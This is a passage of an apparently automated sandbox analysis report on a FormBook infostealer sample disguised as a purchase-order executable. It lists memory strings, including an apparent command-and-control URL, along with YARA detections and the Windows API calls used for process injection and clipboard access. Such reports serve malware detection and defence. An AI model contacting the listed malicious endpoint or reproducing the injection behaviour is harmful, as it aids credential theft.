            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004412000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000004142000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000003.00000003.2104347363.0000000007A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004280000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000003FB0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00307099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00307099
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00307294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00307294
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00307099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00307099
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_002F4342
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0031F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0031F5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0037C863 NtClose,1_2_0037C863
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003519A7 NtProtectVirtualMemory,1_2_003519A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00351A33 NtProtectVirtualMemory,1_2_00351A33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F74340 NtSetContextThread,LdrInitializeThunk,3_2_02F74340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F74650 NtSuspendThread,LdrInitializeThunk,3_2_02F74650
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72AF0 NtWriteFile,LdrInitializeThunk,3_2_02F72AF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72AD0 NtReadFile,LdrInitializeThunk,3_2_02F72AD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_02F72BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72BE0 NtQueryValueKey,LdrInitializeThunk,3_2_02F72BE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_02F72BA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72B60 NtClose,LdrInitializeThunk,3_2_02F72B60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72EE0 NtQueueApcThread,LdrInitializeThunk,3_2_02F72EE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_02F72E80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72FE0 NtCreateFile,LdrInitializeThunk,3_2_02F72FE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72FB0 NtResumeThread,LdrInitializeThunk,3_2_02F72FB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72F30 NtCreateSection,LdrInitializeThunk,3_2_02F72F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_02F72CA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02F72C70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72C60 NtCreateKey,LdrInitializeThunk,3_2_02F72C60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02F72DF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72DD0 NtDelayExecution,LdrInitializeThunk,3_2_02F72DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_02F72D30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk,3_2_02F72D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F735C0 NtCreateMutant,LdrInitializeThunk,3_2_02F735C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F739B0 NtGetContextThread,LdrInitializeThunk,3_2_02F739B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72AB0 NtWaitForSingleObject,3_2_02F72AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72B80 NtQueryInformationFile,3_2_02F72B80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72EA0 NtAdjustPrivilegesToken,3_2_02F72EA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72E30 NtWriteVirtualMemory,3_2_02F72E30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72FA0 NtQuerySection,3_2_02F72FA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72F90 NtProtectVirtualMemory,3_2_02F72F90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72F60 NtCreateProcessEx,3_2_02F72F60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72CF0 NtOpenProcess,3_2_02F72CF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72CC0 NtQueryVirtualMemory,3_2_02F72CC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72C00 NtQueryInformationProcess,3_2_02F72C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72DB0 NtEnumerateKey,3_2_02F72DB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F72D00 NtSetInformationFile,3_2_02F72D00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F73090 NtSetValueKey,3_2_02F73090
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F73010 NtOpenDirectoryObject,3_2_02F73010
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F73D70 NtOpenThread,3_2_02F73D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F73D10 NtOpenProcessToken,3_2_02F73D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025B8F30 NtReadFile,3_2_025B8F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025B8DD0 NtCreateFile,3_2_025B8DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025B9220 NtAllocateVirtualMemory,3_2_025B9220
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025B9020 NtDeleteFile,3_2_025B9020
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025B90C0 NtClose,3_2_025B90C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9F13A NtQueryInformationProcess,3_2_02D9F13A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_002F702F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002EB9F1
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_002F82D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DBDF60_2_002DBDF6
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002BA0C00_2_002BA0C0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D01830_2_002D0183
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F220C0_2_002F220C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B85300_2_002B8530
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D06770_2_002D0677
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B66700_2_002B6670
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E87790_2_002E8779
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0031A8DC0_2_0031A8DC
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D0A8F0_2_002D0A8F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B6BBC0_2_002B6BBC
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B8CA00_2_002B8CA0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DAC830_2_002DAC83
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CAD5C0_2_002CAD5C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E4EBF0_2_002E4EBF
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D0EC40_2_002D0EC4
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003130AD0_2_003130AD
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E113E0_2_002E113E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D12F90_2_002D12F9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E542F0_2_002E542F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0031F5D00_2_0031F5D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002C36800_2_002C3680
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E599F0_2_002E599F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DDA740_2_002DDA74
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002BDCD00_2_002BDCD0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B5D320_2_002B5D32
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002BBDF00_2_002BBDF0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D1E5A0_2_002D1E5A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B9EC90_2_002B9EC9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DDF690_2_002DDF69
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FBFB80_2_002FBFB8
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E7FFD0_2_002E7FFD
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_03BC36000_2_03BC3600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003689131_2_00368913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003519A71_2_003519A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003511F01_2_003511F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003601D31_2_003601D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003601CA1_2_003601CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00366AE31_2_00366AE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00366ADE1_2_00366ADE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00352B201_2_00352B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00352B1D1_2_00352B1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003603F31_2_003603F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0035E4731_2_0035E473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003535201_2_00353520
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003535161_2_00353516
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0037EE631_2_0037EE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003527001_2_00352700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E02741_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C02C01_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C81581_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F41A21_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D20001_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E44201_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310A9A61_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030428401_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E2F301_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
